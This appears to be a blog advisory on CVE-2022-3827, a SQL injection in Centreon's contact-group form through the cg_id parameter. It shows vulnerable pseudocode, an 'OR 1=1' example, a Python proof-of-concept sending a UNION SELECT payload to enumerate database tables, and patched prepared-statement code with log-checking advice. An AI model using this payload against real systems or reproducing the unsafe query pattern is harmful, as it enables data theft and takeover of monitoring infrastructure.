On October 2022, security researchers uncovered a critical SQL injection vulnerability in Centreon, an open-source IT infrastructure monitoring platform widely used in enterprise environments. Registered as CVE-2022-3827 (and VDB-212794), this flaw exposes sensitive backend data and could allow unauthorized access to administrators, passwords, or even let an attacker take control of the whole Centreon system.
This post breaks down CVE-2022-3827 in plain, simple terms, provides sample exploit code, reference links, and explains how to defend against this threat.
Attack Vector: Remote, unauthenticated or authenticated (depends on scenario)
- Patch: 293b10628f7d9f83c6c82c78cf637cbe9b907369
- Identifier: CVE-2022-3827, VDB-212794
What is SQL Injection?
SQL Injection is a technique that allows an attacker to run malicious SQL code on a backend database. By manipulating trusted input, like form fields or URL parameters, the attacker can steal data, escalate privileges, or even destroy data if not stopped.
Why is it dangerous?
Because Centreon manages monitoring data, credentials, configurations, and often has deep access to your infrastructure.
How the Vulnerability Works
The vulnerable file, formContactGroup.php, takes user input from the cg_id parameter (Contact Group ID). The expected behavior is to use this input to select or update database records. However, input validation is missing or weak.
Vulnerable Code Example (Simplified)
// Pseudocode representing the vulnerable logic
$cg_id = $_GET['cg_id'];
$query = "SELECT * FROM contact_groups WHERE cg_id = $cg_id";
$result = mysqli_query($db, $query); // BAD: Unsafe input in SQL query!
If the cg_id is set to a malicious value, it can break out of the intended context and run arbitrary SQL.
The resulting query
SELECT * FROM contact_groups WHERE cg_id = 10 OR 1=1
Now, all contact groups get returned to the attacker.
With further creativity, an attacker could access sensitive tables, dump Centreon credentials, or plant a new admin account.
Proof-of-Concept Exploit
Below is a simplified Python script to trigger the vulnerability and dump table names. This is just for education, do NOT use on systems without clear permission.
import requests
# URL of the vulnerable Centreon instance
url = "http://target-centreon/formContactGroup.php";
# Malicious payload to extract database version for proof
payload = "1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables -- "
params = {"cg_id": payload}
# Send the request
r = requests.get(url, params=params)
if "information_schema" in r.text or "centreon" in r.text:
print("[+] Vulnerability confirmed!")
print(r.text)
else:
print("[-] Target might not be vulnerable.")
With simple modifications, an attacker could list users, hash passwords, or execute inserts, updates, or deletes.
Complete takeover of the Centreon instance
It is remotely exploitable—so attackers do not need to be on the internal network or have privileged accounts (in some configurations).
Official Patch
The Centreon team released a patch to address this issue:
Commit: 293b10628f7d9f83c6c82c78cf637cbe9b907369
What does the fix do?
The patch replaces direct variable use in SQL queries by using prepared statements or safely escapes incoming variables.
Example Secure Code
$cg_id = intval($_GET['cg_id']); // strong input validation
$stmt = $db->prepare("SELECT * FROM contact_groups WHERE cg_id = ?");
$stmt->bind_param("i", $cg_id);
$stmt->execute();
$result = $stmt->get_result();
Check Exposure:
If your formContactGroup.php file is exposed to untrusted users, scan logs for suspicious requests containing SQL payloads (OR 1=1, etc).
References
- NIST NVD - CVE-2022-3827
- VulDB VDB-212794
- Centreon GitHub Patch Commit
- What is SQL Injection? (OWASP)
Conclusion
CVE-2022-3827 in Centreon’s Contact Groups Form is a severe, remotely exploitable SQL injection. If you use Centreon, upgrade right away and inspect logs for past attacks. Keep your monitoring systems safe—they are the eyes and ears of your infrastructure!
Timeline
Published on: 11/02/2022 13:15:00 UTC
Last modified on: 11/04/2022 03:51:00 UTC